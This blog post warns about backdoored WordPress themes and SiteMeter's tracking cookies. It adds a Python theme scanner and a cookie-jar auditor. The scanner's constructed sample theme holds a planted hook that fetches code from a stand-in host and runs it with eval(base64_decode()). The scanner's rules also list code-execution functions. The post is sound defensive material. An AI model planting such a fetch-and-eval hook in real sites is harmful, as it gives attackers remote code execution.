A cautionary tale regarding theme download sites
Via GigaOM:
Back in November, we looked at WordPress themes being distributed by third parties who’d embedded hidden code to allow the insertion of arbitrary content. Now a rash of sites are reporting that their blogs have been subverted....
...There are lots of reasons a hacker may want to inject code into a page:
- To infect visitors by exploiting a browser vulnerability
- To place ads they can then get revenue from
- To embed links to blogs they own, improving their page rank
- To entice people to click on links that lead them elsewhere
The clever thing about the WordPress hack was that it would check for code to insert into a page each time it was loaded, but if none was available, it would just sit there quietly.
It's all too easy to compromise a website's security via the theming layer. Malice is just one possibility. There are also sloppy hacks and vulnerable coding shortcuts from amateur theme developers who just don't know better. The underlying problem is that a theme is not just a stylesheet: in WordPress it is PHP that runs on the server with exactly the same privileges as the rest of the site, so anything in it can read the database, call out to other hosts, and write whatever it likes into every page. It's not just a WordPress thing -- it's all websites, whether built on open source or proprietary platforms (though not static HTML sites, which have no server-side template code to subvert and so are presumably as safe as their servers).
In this context, the question for the website owner is whether you want to buy a theme (or download a free one) from an un-vetted vendor. Sure, if you are an adept coder, and/or know the platform's escaping and sanitising calls (in WordPress, functions such as esc_html(), esc_attr() and esc_url()) well enough to protect your site from things like XSS, you can read through the theme, clean it up and enjoy the design that attracted you in the first place. But if you don't know those vulnerabilities, you could be opening your site up to ill will or novice mistakes. Caveat emptor. Don't end up like Deep Jive. Ouch.
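A quick way to look for the pattern GigaOM describes before activating a downloaded theme is to grep it for the ingredients of that hack: a fetch from another host on every page load, an eval or decode of whatever came back, and a hidden block where injected links land. The scanner below is an added example, not code from this page, from GigaOM or from WordPress; the theme files it scans are constructed samples, and the rules are heuristics that produce leads to read by hand, not verdicts.

```python
"""Added example: a small static scanner for the theme-backdoor pattern
described above (fetch remote content on each page load, run or print it,
stay quiet when nothing is served). Not code from the page or from WordPress;
the theme files below are constructed samples and the rules are heuristics."""
import re
import tempfile
from pathlib import Path

# Each rule: (name, regex, why a reviewer cares). A hit is a lead, not a verdict.
RULES = [
    ("eval", re.compile(r"\beval\s*\("),
     "eval() on anything but a literal is how injected PHP gets executed"),
    ("decode", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
     "unpacking an obfuscated payload"),
    ("remote-fetch", re.compile(
        r"\b(file_get_contents|fopen|curl_init|fsockopen|wp_remote_get)\s*\(\s*['\"]https?://", re.I),
     "content pulled from another host at page-load time"),
    ("request-exec", re.compile(
        r"\b(eval|assert|system|passthru|shell_exec|create_function)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)\b"),
     "request parameters flow into code execution"),
    ("hidden-markup", re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I),
     "hidden block, the usual landing spot for injected links (noisy: check context)"),
]

# Constructed sample theme (hypothetical): one clean file and two planted ones.
SAMPLE_THEME = {
    "footer.php": "<?php wp_footer(); ?>\n</body></html>\n",
    "functions.php": (
        "<?php\n"
        "function demo_setup() { add_theme_support('post-thumbnails'); }\n"
        "add_action('after_setup_theme', 'demo_setup');\n"
        "// Harmless-looking credits hook: pulls and runs remote code on every load\n"
        "function demo_credits() {\n"
        "  $c = @file_get_contents('http://example.invalid/c.txt');\n"
        "  if ($c) { eval(base64_decode($c)); }  // silent when the server returns nothing\n"
        "}\n"
        "add_action('wp_footer', 'demo_credits');\n"
    ),
    "header.php": (
        "<div style=\"display:none\"><a href=\"http://example.invalid/\">hidden link</a></div>\n"
    ),
}


def scan_source(filename, text):
    """Return one finding per (line, rule) hit in a single file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern, why in RULES:
            if pattern.search(line):
                findings.append({"file": filename, "line": lineno, "rule": name,
                                 "why": why, "code": line.strip()})
    return findings


def scan_theme(theme_dir):
    """Scan every .php file under theme_dir in a stable order, so two runs can be diffed."""
    root = Path(theme_dir)
    findings = []
    for path in sorted(root.rglob("*.php")):
        findings.extend(scan_source(str(path.relative_to(root)),
                                    path.read_text(errors="replace")))
    return findings


def write_sample_theme(dest):
    """Materialise the constructed sample theme into a directory."""
    for name, body in SAMPLE_THEME.items():
        Path(dest, name).write_text(body)


def demo():
    """Write the sample theme to a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        write_sample_theme(d)
        return scan_theme(d)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}:{f['line']} [{f['rule']}] {f['code']}\n    {f['why']}")
```

Run it against a real theme with `scan_theme("/path/to/wp-content/themes/yourtheme")`. Expect false positives on the hidden-markup rule (plenty of honest CSS hides things) and expect misses too: a backdoor can spell `eval` as a string and call it through a variable, so a clean scan is a reason to read the theme, not a reason to trust it.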
Is that spyware on your blog? (Or are you just glad to see me?)
Recently my longest-used website statistics service, StatCounter, posted a boast about how they turned away big advertisers who wanted to embed spyware cookies into the StatCounter tracking code. They also hinted that another big web stats company did not say no, and is planting spyware into their clients' websites on behalf of undisclosed advertisers.
You install StatCounter to track visitors to your site NOT to open yourself and your visitors up to being spied upon by phantom advertising corporations.
It appears, however, that other players in the world of webstats were happy to take up this offer…
We were shocked to discover just today that another well known stats provider is allowing up to 9 cookies to be installed in the browser of every visitor that hits one of their member websites. This means that the provider is making money by transmitting data on you and your visitors to a third party advertiser. Not only that, but to add insult to injury, the cookies are causing the member websites to load very slowly too.
Yikes.
Commenters weren't so coy. And neither were other bloggers.
Although SiteMeter has some really useful tools and information, I value your privacy and I will not tolerate this sort of behavior, therefore I’ve removed it completely from the site. I will now be switching to Google Analytics for stats and don’t expect any more problems of this nature. After all Google is known to be one of the most non-evil businesses there is and that is just perfect for The Best in Life.
After five and a half happy years of stats-watching, I have just ditched SiteMeter from this site.
The reason? The SiteMeter Javascript has started serving calls to specificclick.net, which attempts to place site-tracking cookies (a.k.a. spyware) on your machine. Not only is this Bad and Wrong - it's also Dead Slow and A Bit Crap Really. Especially if you're still using Internet Explorer, which has been noticeably slow in loading this site for quite a while now.
So, if you aren't sure if your provider has your best interests at heart and that bothers you, switch. I realise this isn't appealing to those who are a bit attached to that number at the bottom (side, top, centre...WHATEVER) of their web page, but quite frankly, surreptitious loading of cookies onto people's computers to drag more money out of our arses is not that appealing either.
Just sayin'.
As it turns out, the specificclick cookie set via SiteMeter's code "tracks browsing activity." Seems innocuous enough, until you consider that it is a third-party cookie: it lives on specificclick.net's domain rather than the site's, so your browser hands it back to specificclick on every page, on any site, that loads one of their resources, not just on the site where it was first set. Meaning that, across every site carrying their code, they can build up a picture of where you bank, what discussion forums you visit, what, ahem, other websites you might be viewing on the sly.
In a comment on The Best Things in Life: Free, west writes of an email he received from SiteMeter, which proclaimed:
Over the next few months we will be rolling out enhancements to our service that will offer you more information about your users like their other content interests and demographics (a la Quantcast).
I don't know about you, but to me that sounds like, well, spying.
I ran a test: Cleared all my cookies on Opera, which I hardly ever use, and visited my business website. Sure enough, StatCounter is clean: one single cookie, which they use to track visitor behavior on your own site.
Google Analytics, however, is especially sneaky: It sets four cookies and pretends they are set by the site itself. One of these cookies doesn't expire until 2036! Another expires in ... 1969.
I have no idea what Google is doing with these cookies. It seems rather sneaky to mask them as belonging to the site owner, though I suppose that arguably can make their stats more meaningful, as presumably quite a few people set their browsers to block the setting of all cookies except for those originating from the visited site itself.
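The test described above can be repeated on an exported cookie file rather than by eyeballing the browser. The script below is an added example, not code from this page or from any of the stats vendors named: it reads the Netscape cookies.txt format (the export most browsers and curl understand), classifies each cookie as first- or third-party relative to the site being audited, and reports how long each one lives. The jar it reads is a constructed sample (the __utm* names are borrowed from the Google Analytics cookies mentioned above; the values and the tracker host are made up), and FIXED_NOW is an assumed date so the lifetimes come out the same on every run.

```python
"""Added example: audit a browser cookie jar the way the test above does by hand.
Not code from the page or from any stats vendor. Reads Netscape cookies.txt
and, for a given site, reports which cookies are first-party, which belong to
another host, and how long each one lives. All cookies below are constructed."""
from datetime import datetime, timezone

# Constructed jar, as if captured after one fresh visit to www.example.com.
# Columns: domain, include-subdomains, path, secure, expiry (unix secs, 0 = session), name, value
SAMPLE_JAR = """# Netscape HTTP Cookie File (constructed sample, not a real capture)
www.example.com\tFALSE\t/\tFALSE\t0\tPHPSESSID\tabc123
.example.com\tTRUE\t/\tFALSE\t2082758400\t__utma\t1.2.3
.example.com\tTRUE\t/\tFALSE\t0\t__utmc\t1
.tracker.example.net\tTRUE\t/\tFALSE\t1893456000\tUID\tdeadbeef
#HttpOnly_.example.com\tTRUE\t/\tFALSE\t60\tstale\tx
"""

# Assumption: a fixed "now" from the post's era so lifetimes are reproducible.
FIXED_NOW = datetime(2008, 8, 1, tzinfo=timezone.utc)


def parse_cookie_jar(text):
    """Parse Netscape cookies.txt lines; '#HttpOnly_' prefixed lines are cookies, other '#' lines are comments."""
    cookies = []
    for raw in text.splitlines():
        httponly = raw.startswith("#HttpOnly_")
        line = raw[len("#HttpOnly_"):] if httponly else raw
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) < 7:
            continue
        domain, _subdomains, path, secure, expiry, name, value = fields[:7]
        expiry = int(expiry)
        cookies.append({
            "domain": domain, "path": path, "secure": secure == "TRUE",
            "httponly": httponly, "name": name, "value": value,
            "expires": None if expiry == 0 else datetime.fromtimestamp(expiry, timezone.utc),
        })
    return cookies


def registrable_domain(host):
    """Crude eTLD+1: the last two labels. Enough for the .com/.net samples here;
    a real audit should use the Public Suffix List so co.uk-style suffixes work."""
    labels = host.lstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def audit(jar_text, page_host, now=None):
    """Classify every cookie in the jar relative to page_host and flag the worrying ones."""
    now = now or datetime.now(timezone.utc)
    site = registrable_domain(page_host)
    report = []
    for c in parse_cookie_jar(jar_text):
        owner = registrable_domain(c["domain"])
        party = "first" if owner == site else "third"
        if c["expires"] is None:
            lifetime = "session"          # dropped when the browser closes
        else:
            days = (c["expires"] - now).days
            lifetime = "expired" if days < 0 else days
        flags = []
        if party == "third":
            flags.append("sent to %s from every site that embeds it: cross-site tracking" % owner)
        if isinstance(lifetime, int) and lifetime > 365:
            flags.append("persists %d days: a long-lived identifier" % lifetime)
        if lifetime == "expired":
            flags.append("already expired: a past expiry is how a server tells the browser to drop it")
        report.append({"name": c["name"], "domain": c["domain"], "party": party,
                       "lifetime": lifetime, "flags": flags})
    return report


if __name__ == "__main__":
    for row in audit(SAMPLE_JAR, "www.example.com", FIXED_NOW):
        print(f"{row['name']:<10} {row['domain']:<22} {row['party']}-party  {row['lifetime']}")
        for flag in row["flags"]:
            print("    ! " + flag)
```

The jar tells you who can read a cookie (its domain), not who wrote it. Cookies that a stats script writes onto the site's own domain look first-party in any jar, which is exactly why they get past a browser set to refuse third-party cookies. Attributing a cookie to the script that set it takes a before-and-after test like the one above: clear cookies, load the page, then compare against a copy of the page with the tracking snippet removed.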
As for SiteMeter, I can't say I cared for their service in the first place. I had tried them years ago, but never stuck. Needless to say, I won't be going back any time soon. Where things stand with SiteMeter's spyware policy now, I'm not sure. Shane offers this update:
Two and a half weeks after StatCounter broke the story and it began to spread across the web, SiteMeter has begun to respond to the issue both in the comments of my post and at much greater length in the comments on Eric Odem’s.
Despite that, though, I still cannot find the official response they say is on their own blog, nor have they directly addressed many of the specific issues that people have reported. I hate that because I have a feeling they really haven’t done anything wrong, but their damage control isn’t helping them at all.
Michael Sync has a helpful public service kind of post for those not all that familiar with cookies or how to deal with them.
Meanwhile, I'm glad I've been using StatCounter.